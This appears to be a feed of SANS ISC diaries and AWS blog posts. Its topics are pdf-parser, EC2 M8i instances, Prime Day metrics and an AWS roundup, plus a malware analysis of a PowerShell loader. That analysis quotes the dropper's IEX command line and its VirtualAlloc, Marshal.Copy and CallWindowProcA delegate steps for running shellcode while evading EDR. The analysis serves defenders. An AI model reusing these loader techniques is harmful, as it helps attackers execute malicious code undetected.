All posts by David

pdf-parser: All Streams, (Sun, Aug 31st)

A user reported a bug in pdf-parser: when dumping all filtered streams, an error would occur:

The reason for the error is that not all streams have filters applied to them; trying to dump the filtered content of a stream that has no filter triggered the bug.

I have fixed this:

But I would like to point out that, in my opinion, a better way to look at the content of all filtered streams is to have pdf-parser produce JSON output and then display it with myjson-filter.py, like this:
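(A command along these lines should reproduce it; the --jsonoutput option and the plain myjson-filter.py invocation are assumptions based on the usual conventions of these tools, and example.pdf is a placeholder, so check each tool's --help for the exact syntax.)

# Sketch only: emit the filtered stream contents as JSON, then let myjson-filter.py display the items.
pdf-parser.py -f --jsonoutput example.pdf | myjson-filter.py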

Now you see the content of the streams and to which object they belong. And if a stream has no filters, you also see this: 'No filters'.

Finally, the PDF comments that you saw in screenshot 2 are also gone: you only get streams.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

New general-purpose Amazon EC2 M8i and M8i Flex instances are now available

Today, we’re announcing the general availability of Amazon Elastic Compute Cloud (Amazon EC2) general-purpose M8i and M8i-Flex instances, powered by custom Intel Xeon 6 processors available only on AWS that deliver a sustained all-core turbo frequency of 3.9 GHz. These instances deliver the highest performance and fastest memory bandwidth among comparable Intel processors in the cloud. They also deliver up to 15 percent better price performance, up to 20 percent higher performance, and 2.5 times more memory bandwidth compared to previous generation M7i and M7i-Flex instances.

M8i and M8i-Flex instances are ideal for running general-purpose workloads such as web application servers, virtual desktops, batch processing, microservices, databases, and enterprise applications. In terms of performance, these instances are up to 60 percent faster for NGINX web applications, up to 30 percent faster for PostgreSQL database workloads, and up to 40 percent faster for AI deep learning recommendation models compared to M7i and M7i-Flex instances.

Like the R8i and R8i-Flex instances, these instances use the new sixth-generation AWS Nitro Cards, delivering up to two times more network and Amazon Elastic Block Store (Amazon EBS) bandwidth compared to previous generation instances. This greatly improves network throughput for workloads handling small packets, such as web, application, and gaming servers. They also support configurable bandwidth allocation between network and Amazon EBS bandwidth, adjustable in 25 percent increments, enabling better database performance, query processing, and logging speeds.

M8i instances
M8i instances provide up to 384 vCPUs and 1.5 TB of memory, including bare metal sizes that provide dedicated access to the underlying physical hardware. These SAP-certified instances help you run workloads that need the largest instance sizes or sustained high CPU usage, such as large application servers and databases, gaming servers, CPU-based inference, and video streaming.

Here are the specs for M8i instances:

Instance size vCPUs Memory (GiB) Network bandwidth (Gbps) EBS bandwidth (Gbps)
m8i.large 2 8 Up to 12.5 Up to 10
m8i.xlarge 4 16 Up to 12.5 Up to 10
m8i.2xlarge 8 32 Up to 15 Up to 10
m8i.4xlarge 16 64 Up to 15 Up to 10
m8i.8xlarge 32 128 15 10
m8i.12xlarge 48 192 22.5 15
m8i.16xlarge 64 256 30 20
m8i.24xlarge 96 384 40 30
m8i.32xlarge 128 512 50 40
m8i.48xlarge 192 768 75 60
m8i.96xlarge 384 1536 100 80
m8i.metal-48xl 192 768 75 60
m8i.metal-96xl 384 1536 100 80

M8i-Flex instances
M8i-Flex instances are a lower-cost variant of the M8i instances, with 5 percent better price performance at 5 percent lower prices. They’re designed for workloads that benefit from the latest-generation performance but don’t fully utilize all compute resources. These instances can reach the full CPU performance 95 percent of the time.

Here are the specs for the M8i-Flex instances:

Instance size vCPUs Memory (GiB) Network bandwidth (Gbps) EBS bandwidth (Gbps)
m8i-flex.large 2 8 Up to 12.5 Up to 10
m8i-flex.xlarge 4 16 Up to 12.5 Up to 10
m8i-flex.2xlarge 8 32 Up to 15 Up to 10
m8i-flex.4xlarge 16 64 Up to 15 Up to 10
m8i-flex.8xlarge 32 128 Up to 15 Up to 10
m8i-flex.12xlarge 48 192 Up to 22.5 Up to 15
m8i-flex.16xlarge 64 256 Up to 30 Up to 20

If you’re currently using earlier generations of general-purpose instances, you can adopt M8i-Flex instances without having to make changes to your application or your workload.

Now available
Amazon EC2 M8i and M8i-Flex instances are available today in the US East (N. Virginia), US East (Ohio), US West (Oregon), and Europe (Spain) AWS Regions. M8i and M8i-Flex instances can be purchased as On-Demand Instances, with Savings Plans, or as Spot Instances. M8i instances are also available as Dedicated Instances and on Dedicated Hosts. To learn more, visit the Amazon EC2 Pricing page.
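If you want to confirm which M8i sizes are offered in a given Region before migrating, the AWS CLI can list them; a quick check along these lines (the Region, query, and output format are just examples):

# List the M8i instance types offered in us-east-1.
aws ec2 describe-instance-type-offerings --region us-east-1 --filters "Name=instance-type,Values=m8i.*" --query "InstanceTypeOfferings[].InstanceType" --output table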

Give M8i and M8i-Flex instances a try in the Amazon EC2 console. To learn more, visit the Amazon EC2 M8i instances page and send feedback to AWS re:Post for EC2 or through your usual AWS Support contacts.

Channy

Interesting Technique to Launch a Shellcode, (Wed, Aug 27th)

In most attack scenarios, attackers have to perform a crucial operation: to load a shellcode in memory and execute it. This is often performed in a three-step process:

  1. Some memory must be allocated and flagged as "executable" with VirtualAlloc() (and sometimes combined with VirtualProtect())
  2. The shellcode (often after deobfuscation) is copied into this newly allocated memory region with a memory-copy function such as RtlMoveMemory() or Marshal.Copy()
  3. The shellcode is launched by creating a new thread (with CreateThread() or an equivalent).

With this technique, the shellcode will be executed in the context of the current process, but alternative techniques might, of course, load and execute the shellcode in a remote process.

This technique is pretty well flagged by most EDRs. That's why attackers are always looking for alternative ways to execute malicious code and defeat EDRs. I found a nice piece of PowerShell that implements such an alternative technique!

The PowerShell script is dropped by a Windows executable (SHA256:ec8ec8b3234ceeefbf74b2dc4914d5d6f7685655f6f33f2226e2a1d80e7ad488)[1]. It dumps many files, but two of them are interesting:

C:UsersREMAppDataRoamingCafeterias108butikscentersNonrepentancemenneskevrdige.Paa
C:UsersREMAppDataRoamingCafeterias108butikscentersSkydeprammenesBogskrivninger70.Mde

Then it launches the following command line:

"powershell.exe" -windowstyle minimized "$microcolorimetric=gc -Raw 'C:UsersREMAppDataRoamingCafeterias108butikscentersSkydeprammenesBogskrivninger70.Mde';$Hosiomartyr=$microcolorimetric.SubString(52695,3);

Let's check the substring extracted by PowerShell:

remnux@remnux:~/malwarezoo/20250825$ cut-bytes.py -d 52695:3l Bogskrivninger70.Mde 
Iex 

IEX (or "Invoke-Expression") is never good news in PowerShell scripts!

The file Bogskrivninger70.Mde is pretty well obfuscated:


The most interesting function is this one:


    
vrvlenes() will deobfuscate strings and, if the second parameter is set to a non-zero value, execute the deobfuscated string with IEX. I decoded all of them, and the following ones give a good understanding of the script.

First, we have calls to VirtualAlloc():

$global:integrity = $geparders.Invoke(0, 7119, $heterographical, $direktrstolene)
$global:autorisationens = $geparders.Invoke(0, 53846016, $heterographical, $krablende)

The second file (see above) is read:

$snatchy="$env:APPDATACafeterias108butikscentersNonrepentancemenneskevrdige.Paa"
$global:ventose = [System.IO.File]::ReadAllBytes($snatchy)

The shellcode is extracted at offset 2048 (size 7119 bytes) and copied to the address returned by the first call to VirtualAlloc():

[System.Runtime.InteropServices.Marshal]::Copy($ventose, 2048,  $integrity, 7119)

A second payload is extracted and copied into the second memory region:

[System.Runtime.InteropServices.Marshal]::Copy($ventose, 7119+2048, $autorisationens, $revalideringscenteret36)

And now the magic will happen. The interesting variables are:

  • $gttes = "User32"
  • $thars = "CallWindowProcA":
$global:saarskorpers = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((endothorax $gttes $tahrs), (calumniators @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [IntPtr]) ([IntPtr])))
$saarskorpers.Invoke($integrity,$autorisationens,$flagres,0,0)
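To make the mechanism clearer, here is a small benign sketch of the same trick (the names below are illustrative and not taken from the malware): Marshal.GetDelegateForFunctionPointer() turns an arbitrary raw function pointer into a callable .NET delegate, which is exactly how the script obtains something it can Invoke().

Add-Type @"
using System;
using System.Runtime.InteropServices;
public static class PtrDemo
{
    [DllImport("kernel32.dll", CharSet = CharSet.Ansi)]
    public static extern IntPtr GetModuleHandleA(string name);
    [DllImport("kernel32.dll", CharSet = CharSet.Ansi)]
    public static extern IntPtr GetProcAddress(IntPtr module, string name);
    // Delegate matching GetTickCount(): no arguments, returns a DWORD.
    [UnmanagedFunctionPointer(CallingConvention.StdCall)]
    public delegate uint GetTickCountDelegate();
}
"@
# Resolve a raw pointer to a harmless API and wrap it in a delegate.
$ptr = [PtrDemo]::GetProcAddress([PtrDemo]::GetModuleHandleA("kernel32.dll"), "GetTickCount")
$tick = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptr, [PtrDemo+GetTickCountDelegate])
$tick.Invoke()   # calls straight into the raw pointer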

I executed the malicious script in the PowerShell ISE debugger to keep it under control. Once the first memory allocation has been performed, let's attach a debugger to the PowerShell process:

$global:integrity = $geparders.Invoke(0, 7119, $heterographical, $direktrstolene)
[DBG]: PS C:UsersREM>> $integrity
2156785106944

That's where the new memory has been allocated (in hex 0x1F62A690000) and where the shellcode will be loaded. You can see that the memory has been zeroed (freshly allocated) and is ready to receive some data. Let's create a hardware breakpoint on this location:


    
In the deobfuscated strings, there is an interesting API call: CallWindowProc(). Let's create another breakpoint on it. Once reached, you can see the address of the shellcode passed as the first argument:


Let's allow PowerShell to invoke CallWindowProcA(), and we get the hardware breakpoint at the beginning of the shellcode:


Bad news, the shellcode crashed on my system…

Let's focus on the API call CallWindowProc()[2]. It is a Win32 GUI API that invokes a window procedure: you give it a function pointer, and it calls that pointer with four arguments and returns the result. As usual, this API call is not malicious by itself and can be very useful to developers who want to extend the capabilities of their GUI. For example, tools like screen readers and hotkey managers can use this API call to monitor window messages.
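A harmless way to see this behavior for yourself (a sketch only; the helper type name is mine): resolve the address of the legitimate DefWindowProcW and hand it to CallWindowProcW, which happily calls whatever pointer it is given.

Add-Type -Namespace Win32Demo -Name Native -MemberDefinition @"
[DllImport("kernel32.dll", CharSet = CharSet.Ansi)]
public static extern IntPtr LoadLibraryA(string name);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi)]
public static extern IntPtr GetProcAddress(IntPtr module, string name);
[DllImport("user32.dll")]
public static extern IntPtr CallWindowProcW(IntPtr lpPrevWndFunc, IntPtr hWnd, uint msg, IntPtr wParam, IntPtr lParam);
"@
# Any function pointer will do; here it is the address of the default window procedure.
$defProc = [Win32Demo.Native]::GetProcAddress([Win32Demo.Native]::LoadLibraryA("user32.dll"), "DefWindowProcW")
# WM_NULL (0) with a NULL window handle: DefWindowProcW simply returns 0.
[Win32Demo.Native]::CallWindowProcW($defProc, [IntPtr]::Zero, 0, [IntPtr]::Zero, [IntPtr]::Zero)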

Attackers can decide to use it because:

  • It executes code!
  • It accepts any function pointer and blindly executes it.
  • No new thread is needed! Many EDRs monitor CreateThread/NtCreateThreadEx. Here, execution happens on the existing GUI thread.
  • Looks “normal” for GUI apps. Calling window procedures and dispatching messages is standard GUI behavior, so this can blend in with benign activity.

 Conclusion: Attackers always find ways to operate below the radar with "exotic" API calls. CallWindowProc() is a new one to keep an eye on!

[1] https://www.virustotal.com/gui/file/ec8ec8b3234ceeefbf74b2dc4914d5d6f7685655f6f33f2226e2a1d80e7ad488/detection
[2] https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-callwindowprocw

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Getting a Better Handle on International Domain Names and Punycode, (Tue, Aug 26th)

International domain names (IDN) continue to be an interesting topic. For the most part, they are probably less of an issue than some people make them out to be, given that popular browsers like Google Chrome are pretty selective in displaying them. But on the other hand, they are still used, legitimately or not, and keeping a handle on them is interesting.
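As a quick illustration of the Punycode mapping involved, .NET's IdnMapping class (usable straight from PowerShell) converts between the Unicode and ASCII ("xn--") forms of a domain name; a minimal sketch:

# Convert an internationalized domain name to its ASCII/Punycode form and back.
$idn = New-Object System.Globalization.IdnMapping
$idn.GetAscii("bücher.example")              # -> xn--bcher-kva.example
$idn.GetUnicode("xn--bcher-kva.example")     # -> bücher.example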

AWS services scale to new heights for Prime Day 2025: key metrics and milestones

Amazon Prime Day 2025 was the biggest Amazon Prime Day shopping event ever, setting records for both sales volume and total items sold during the 4-day event. Prime members saved billions while shopping Amazon’s millions of deals during the event.

This year marked a significant transformation in the Prime Day experience through advancements in the generative AI offerings from Amazon and AWS. Customers used Alexa+—Amazon’s next-generation personal assistant, now available in early access to millions of customers—along with the AI-powered shopping assistant, Rufus, and AI Shopping Guides. These features, built on more than 15 years of cloud innovation and machine learning expertise from AWS, combined with deep retail and consumer experience from Amazon, helped customers quickly discover deals and get product information, complementing the fast, free delivery that Prime members enjoy year-round.

As part of our annual tradition to tell you about how AWS powered Prime Day for record-breaking sales, I want to share the services and chart-topping metrics from AWS that made your amazing shopping experience possible.


Prime Day 2025 – all the numbers
During the weeks leading up to big shopping events like Prime Day, Amazon fulfillment centers and delivery stations work to get ready and ensure operations run efficiently and safely. For example, the Amazon automated storage and retrieval system (ASRS) operates a global fleet of industrial mobile robots that move goods around Amazon fulfillment centers.

AWS Outposts, a fully managed service that extends the AWS experience on-premises, powers software applications that manage the command-and-control of Amazon ASRS and supports same-day and next-day deliveries through low-latency processing of critical robotic commands.

During Prime Day 2025, AWS Outposts at one of the largest Amazon fulfillment centers sent more than 524 million commands to over 7,000 robots, reaching peak volumes of 8 million commands per hour—a 160 percent increase compared to Prime Day 2024.

Here are some more interesting, mind-blowing metrics:

  • Amazon Elastic Compute Cloud (Amazon EC2) – During Prime Day 2025, AWS Graviton, a family of processors designed to deliver the best price performance for cloud workloads running in Amazon EC2, powered more than 40 percent of the Amazon EC2 compute used by Amazon.com. Amazon also deployed over 87,000 AWS Inferentia and AWS Trainium chips – custom silicon chips for deep learning and generative AI training and inference – to power Amazon Rufus for Prime Day.
  • Amazon SageMaker AI — Amazon SageMaker AI, a fully managed service that brings together a broad set of tools to enable high-performance, low-cost machine learning (ML), processed more than 626 billion inference requests during Prime Day 2025.
  • Amazon Elastic Container Service (Amazon ECS) and AWS Fargate – Amazon ECS is a fully managed container orchestration service that works seamlessly with AWS Fargate, a serverless compute engine for containers. During Prime Day 2025, Amazon ECS launched an average of 18.4 million tasks per day on AWS Fargate, representing a 77 percent increase from the previous year’s Prime Day average.
  • AWS Fault Injection Service (AWS FIS) – We ran over 6,800 AWS FIS experiments—over eight times more than we conducted in 2024—to test resilience and ensure Amazon.com remains highly available on Prime Day. This significant increase was made possible by two improvements: new Amazon ECS support for network fault injection experiments on AWS Fargate, and the integration of FIS testing in continuous integration and continuous delivery (CI/CD) pipelines.
  • AWS Lambda – AWS Lambda, a serverless compute service that lets you run code without managing infrastructure, handled over 1.7 trillion invocations per day during Prime Day 2025.
  • Amazon API Gateway – During Prime Day 2025, Amazon API Gateway, a fully managed service that makes it easy to create, maintain, and secure APIs at any scale, processed over 1 trillion internal service requests—a 30 percent increase in requests on average per day compared to Prime Day 2024.
  • Amazon CloudFront – Amazon CloudFront, a content delivery network (CDN) service that securely delivers content with low latency and high transfer speeds, delivered over 3 trillion HTTP requests during the global week of Prime Day 2025, a 43 percent increase in requests compared to Prime Day 2024.
  • Amazon Elastic Block Store (Amazon EBS) – During Prime Day 2025, Amazon EBS, our high-performance block storage service, peaked at 20.3 trillion I/O operations, moving up to an exabyte of data daily.
  • Amazon Aurora – On Prime Day, Amazon Aurora, a relational database management system (RDBMS) built for high performance and availability at global scale for PostgreSQL, MySQL, and DSQL, processed 500 billion transactions, stored 4,071 terabytes of data, and transferred 999 terabytes of data.
  • Amazon DynamoDB – Amazon DynamoDB, a serverless, fully managed, distributed NoSQL database, powers multiple high-traffic Amazon properties and systems including Alexa, the Amazon.com sites, and all Amazon fulfillment centers. Over the course of Prime Day, these sources made tens of trillions of calls to the DynamoDB API. DynamoDB maintained high availability while delivering single-digit millisecond responses and peaking at 151 million requests per second.
  • Amazon ElastiCache – During Prime Day, Amazon ElastiCache, a fully managed caching service delivering microsecond latency, peaked at serving over 1.5 quadrillion daily requests and over 1.4 trillion requests in a minute.
  • Amazon Kinesis Data Streams – Amazon Kinesis Data Streams, a fully managed serverless data streaming service, processed a peak of 807 million records per second during Prime Day 2025.
  • Amazon Simple Queue Service (Amazon SQS) – During Prime Day 2025, Amazon SQS – a fully managed message queuing service for microservices, distributed systems, and serverless applications – set a new peak traffic record of 166 million messages per second.
  • Amazon GuardDuty – During Prime Day 2025, Amazon GuardDuty, an intelligent threat detection service, monitored an average of 8.9 trillion log events per hour, a 48.9 percent increase from last year’s Prime Day.
  • AWS CloudTrail – AWS CloudTrail, which tracks user activity and API usage on AWS, as well as in hybrid and multicloud environments, processed over 2.5 trillion events during Prime Day 2025, compared to 976 billion events in 2024.

Prepare to scale
If you’re preparing for similar business-critical events, product launches, and migrations, I recommend that you take advantage of our newly branded AWS Countdown (formerly known as AWS Infrastructure Event Management, or IEM). This comprehensive support program helps assess operational readiness, identify and mitigate risks, and plan capacity, using proven playbooks developed by AWS experts. We’ve expanded to include: generative AI implementation support to help you confidently launch and scale AI initiatives; migration and modernization support, including mainframe modernization; and infrastructure optimization for specialized sectors including election systems, retail operations, healthcare services, and sports and gaming events.

I look forward to seeing what other records will be broken next year!

Channy

AWS Weekly Roundup: Amazon Aurora 10th anniversary, Amazon EC2 R8 instances, Amazon Bedrock and more (August 25, 2025)

As I was preparing for this week’s roundup, I couldn’t help but reflect on how database technology has evolved over the past decade. It’s fascinating to see how architectural decisions made years ago continue to shape the way we build modern applications. This week brings a special milestone that perfectly captures this evolution in cloud database innovation as Amazon Aurora celebrated 10 years of database innovation.

Birthday cake with words Happy Birthday Amazon Aurora!

Amazon Web Services (AWS) Vice President Swami Sivasubramanian reflected on LinkedIn about his journey with Amazon Aurora, calling it “one of the most interesting products” he’s worked on. When Aurora launched in 2015, it shifted the database landscape by separating compute and storage. Now trusted by hundreds of thousands of customers across industries, Aurora has grown from a MySQL-compatible database to a comprehensive platform featuring innovations such as Aurora DSQL, serverless capabilities, I/O-Optimized pricing, zero-ETL integrations, and generative AI support. Last week’s celebration on August 21 highlighted this decade-long transformation that continues to simplify database scaling for customers.

Last week’s launches

In addition to the inspiring celebrations, here are some AWS launches that caught my attention:

  • AWS Billing and Cost Management introduces customizable Dashboards — This new feature consolidates cost data into visual dashboards with multiple widget types and visualization options, combining information from Cost Explorer, Savings Plans, and Reserved Instance reports to help organizations track spending patterns and share standardized cost reporting across accounts.
  • Amazon Bedrock simplifies access to OpenAI open weight models — AWS has streamlined access to OpenAI’s open weight models (gpt-oss-120b and gpt-oss-20b), making them automatically available to all users without manual activation while maintaining administrator control through IAM policies and service control policies.
  • Amazon Bedrock adds batch inference support for Claude Sonnet 4 and GPT-OSS models — This feature provides asynchronous processing of multiple inference requests at 50 percent lower pricing compared to on-demand inference, optimizing high-volume AI tasks such as document analysis, content generation, and data extraction, with Amazon CloudWatch metrics for tracking batch workload progress.
  • AWS launches Amazon EC2 R8i and R8i-Flex memory-optimized instances — Powered by custom Intel Xeon 6 processors, these new instances deliver up to 20 percent better performance and 2.5 times higher memory throughput than R7i instances, making them ideal for memory-intensive workloads like databases and big data analytics, with R8i-Flex offering additional cost savings for applications that don’t fully utilize compute resources.
  • Amazon S3 introduces batch data verification feature — A new capability in S3 Batch Operations that offers efficient verification of billions of objects using multiple checksum algorithms without downloading or restoring data, generating detailed integrity reports for compliance and audit purposes regardless of storage class or object size.

Other AWS news

Here are some additional projects and blog posts that you might find interesting:

  • Amazon introduces DeepFleet foundation models for multirobot coordination — Trained on millions of hours of data from Amazon fulfillment and sortation centers, these pioneering models predict future traffic patterns for robot fleets, representing the first foundation models specifically designed for coordinating multiple robots in complex environments.
  • Building Strands Agents with a few lines of code — A new blog demonstrates how to build multi-agent AI systems with a few lines of code, enabling specialized agents to collaborate seamlessly, handle complex workflows, and share information through standardized protocols for creating distributed AI systems beyond individual agent capabilities.
  • AWS Security Incident Response introduces ITSM integrations — New integrations with Jira and ServiceNow provide bidirectional synchronization of security incidents, comments, and attachments, streamlining response while maintaining existing processes, with open source code available on GitHub for customization and extension to additional IT service management (ITSM) platforms.
  • Finding root-causes using a network digital twin graph and agentic AI — A detailed blog post shows how AWS collaborated with NTT DOCOMO to build a network digital twin using graph databases and autonomous AI agents, helping telecom operators to move beyond correlation to identify true root causes of complex network issues, predict future problems, and improve overall service reliability.

Upcoming AWS events
Check your calendars and sign up for these upcoming AWS events:

  • AWS Summits — Join free online and in-person events that bring the cloud computing community together to connect, collaborate, and learn about AWS. Register in your nearest city: Toronto (September 4), Los Angeles (September 17), and Bogotá (October 9).
  • AWS re:Invent 2025 — This flagship annual conference is coming to Las Vegas from December 1–5. The event catalog is now available. Mark your calendars for this not-to-be-missed gathering of the AWS community.
  • AWS Community Days — Join community-led conferences that feature technical discussions, workshops, and hands-on labs led by expert AWS users and industry leaders from around the world: Adria (September 5), Baltic (September 10), Aotearoa (September 18), South Africa (September 20), Bolivia (September 20), Portugal (September 27).

Join the AWS Builder Center to learn, build, and connect with builders in the AWS community. Browse here for upcoming in-person and virtual developer-focused events.

That’s all for this week. Check back next Monday for another Weekly Roundup!

Betty

The end of an era: Properly formatted IP addresses in all of our data., (Sun, Aug 24th)

The Internet Storm Center and DShield websites are about 25 years old. Back in the day, I made some questionable decisions that I never quite cleaned up. One of these decisions was to use a "15 character 0-padded" format for IP addresses. This format padded each byte of the IP address with leading 0s, ensuring that every address was 15 characters long (dots included).
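For illustration, the padding described above can be reproduced with a few lines (a sketch, not the original code):

# Pad each octet to three digits, yielding the fixed 15-character legacy format.
function ConvertTo-PaddedIP ([string]$ip) {
    ($ip.Split('.') | ForEach-Object { $_.PadLeft(3, '0') }) -join '.'
}
ConvertTo-PaddedIP '10.1.2.3'    # -> 010.001.002.003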

Don't Forget The "-n" Command Line Switch, (Thu, Aug 21st)

A lot of people like the command line, the CLI, the shell (call it what you want) because it provides a lot of powerful tools for performing investigations. The best example is probably parsing logs! Even if we have SIEMs to ingest and process them, many people still fall back on the good old suite of grep, cut, awk, sort, uniq, and many more.